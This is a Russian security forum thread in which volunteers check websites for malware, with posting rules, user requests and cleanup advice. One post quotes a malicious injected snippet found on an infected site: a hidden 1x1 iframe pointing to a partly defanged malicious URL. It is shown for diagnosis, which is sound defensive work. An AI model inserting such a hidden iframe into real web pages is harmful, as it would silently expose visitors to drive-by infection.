Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

Razey

Активный пользователь
Сообщения
674
Реакции
31
Баллы
418
...то, что указал ссылку и дальнейший переход на сайты - в итоге ничего не даст?..
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
Администратор попытался заработать на переходах.
 

Razey

Активный пользователь
Сообщения
674
Реакции
31
Баллы
418
А адрес т.н. "финального сайта" является зараженным?.. Или я вообще мало понимаю и мне надо больше ЧИТАТЬ?
 

romin

Активный пользователь
Сообщения
4
Реакции
0
Баллы
381
Проверьте, пожалуйста, этот сайт - хттп://smatrikino2.ru/. Сам я ничего не обнаруживаю, но знакомый говорит что вроде троян там или вредоносный код.
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
А если "пробив" будет удачным, то получим файл calc.exe
 

romin

Активный пользователь
Сообщения
4
Реакции
0
Баллы
381
вирус на сайте

Заражен.
PHP:
</script><iframe name="CMvCU" src="hттпp://li*me.ru/in.cgi?4" style="position: absolute; top: 0px; height: 1px; width: 1px; right: 0px;" id="CMvCU"></iframe>
Который транслирует с сайта fast**datee.com

http://www.virustotal.com/file-scan...66a52cd7a6f19ddae5cee9203b22e95504-1325094401
http://www.virustotal.com/file-scan...6835cc48e7a2a08eb553196e05cc7a0496-1325096193

http://geo.flagfox.net/?ip=146.185.245.49&host=fastupdatee.com
извените обясните по подробней где этот код
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
Нужно искать в шаблонах, файлах, рекламных партнерках.

0. Отключите ресурс
1. Отключите все партнерки и проверьте признаки заражения - если есть, то
2. Проверьте содержимое файлов на FTP в сравнении с исходниками движка, включая содержимое файлов .htaccess
3. Проверьте содержимое шаблонов в админке

Нашли?
1. Проверьте свой ПК на наличие вредоносного кода.
2. Смените пароли на FTP и базу данных

Удалили заражение?
1. Убедитесь, что движек ресурса является последней версией линейки и в нем отсутствуют критические уязвимости.
 

Cuckoo

Активный пользователь
Сообщения
3
Реакции
0
Баллы
381
Здравствуйте akoK, хотел попросить проверить мой сайт хттп://cuckoo.ucoz.com потому что в последнее время мой антивирь Авира жалуется как какой то вирус на сайте. Заранее благодарен за помощь!
 
Последнее редактирование модератором:

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
Ничего вредоносного на сайте не вижу. Приложите, пожалуйста, скрин с алертом Авиры.
 

SNS-amigo

SNS System Watch Freelance reporter
Сообщения
5,071
Реакции
6,997
Баллы
803
Cuckoo,
WebGuard в APSS ругается на javascript Укоза. В общем и правильно делает, что ругается. Это злючая реклама Укоза лезет из всех щелей. Но вы приняли соглашение на её присутствие, когда создавали сайт на этом хостинге.

Новая версия APSS уже называется Avira Internet Security. Обновите программу до актуальной версии. А своих пользователей, использующих Авиру, предупредите, чтобы они добавили ваш сайт в исключения для модуля WebGuard или при установке новой версии вообще сняли галочку на этот компоненте. Тогда он не будет установлен и не будет ругаться на рекламу этого Укоза.
 

Cuckoo

Активный пользователь
Сообщения
3
Реакции
0
Баллы
381
SNS-amigo, спасибо за ответ, хоть успокоили.
 

SNS-amigo

SNS System Watch Freelance reporter
Сообщения
5,071
Реакции
6,997
Баллы
803
Cuckoo, Скажу больше, модулем WebGuard занимается не сама Авира (Avira Operations GmbH & Co), а сторонная компания-партнёр, потому до них, можно сказать, не достучаться.
Более того этот модуль рубит множество рунетовских счётчиков. Даже вовсе безобидные.
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
Информация
Часть постов перенес в эту тему
 

shestale

Ассоциация VN/VIP
Преподаватель
Сообщения
9,705
Реакции
4,654
Баллы
753
хттп://www.securelist.com/ru/descriptions/101174/Trojan.Win32.Qhost.e
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
Ничего не вижу. Может реакция на содержимое страницы?
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,320
Баллы
2,203
Вечером перепроверю на виртуалке.
 
Сверху Снизу